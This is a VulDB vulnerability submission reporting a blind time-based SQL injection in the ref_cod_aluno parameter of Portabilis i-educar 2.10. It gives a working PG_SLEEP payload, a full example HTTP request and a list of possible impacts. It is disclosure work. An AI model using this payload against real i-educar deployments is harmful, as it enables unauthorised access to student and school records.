Submit #643549: Portabilis i-educar 2.10 SQL Injectioninfo

TitlePortabilis i-educar 2.10 SQL Injection
Description# SQL Injection (Blind Time-Based) Vulnerability in ref_cod_aluno Parameter on educar_historico_escolar_lst.php Endpoint --- ## Summary A SQL Injection vulnerability was identified in the `educar_historico_escolar_lst.php` endpoint of the _i-educar_ application, specifically in the `ref_cod_aluno` parameter. This vulnerability allows attackers to execute arbitrary SQL commands on the backend database, potentially compromising the confidentiality, integrity, and availability of application data. --- ## Details **Vulnerable Endpoint:** `/educar_historico_escolar_lst.php` **Parameter:** `ref_cod_aluno` The application fails to properly validate and sanitize user input in the `ref_cod_aluno` parameter. As a result, attackers can inject crafted SQL payloads that are executed directly by the database. This may allow database enumeration, data exfiltration, modification, or denial of service via time-based delays. --- ## PoC **Payload:** `AND 6986=(SELECT 6986 FROM PG_SLEEP(5))` This payload introduces a **5-second time delay** in the server response, confirming that the parameter is vulnerable to blind time-based SQL injection. **Example Request:** ``` GET /intranet/educar_historico_escolar_lst.php?ref_cod_aluno=206+AND+6986=(SELECT+6986+FROM+PG_SLEEP(5)) HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br, zstd Connection: keep-alive Cookie: [COOKIE] Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: none Sec-Fetch-User: ?1 Priority: u=0, i ``` ![[Pasted image 20250818003041.png]] The delayed response demonstrates that the injected SQL command was successfully executed by the backend database. ![[Pasted image 20250818003142.png]] --- ## Impact - **Unauthorized data access:** Retrieving sensitive information such as credentials, personal data, or configuration details - **Database enumeration:** Extracting schema names, tables, and column structures - **Data manipulation:** Inserting, updating, or deleting database records - **Denial of Service (DoS):** Using time-based injections to disrupt application availability - **Potential privilege escalation or RCE:** Depending on database configuration and available functions This vulnerability could lead to full compromise of the database and exposure of sensitive application and user data.
Source⚠️ https://github.com/marcelomulder/CVE/blob/main/i-educar/SQL%20Injection%20(Blind%20Time-Based)%20Vulnerability%20in%20ref_cod_aluno%20Parameter%20on%20educar_historico_escolar_lst.php%20Endpoint.md
User
 marceloQz (UID 87549)
Submission08/28/2025 21:10 (10 months ago)
Moderation09/05/2025 10:48 (8 days later)
StatusAccepted
VulDB entry322737 [Portabilis i-Educar up to 2.10 educar_historico_escolar_lst.php ref_cod_aluno sql injection]
Points20

PreviousOverviewNext

Are you interested in using VulDB?

Download the whitepaper to learn more about our service!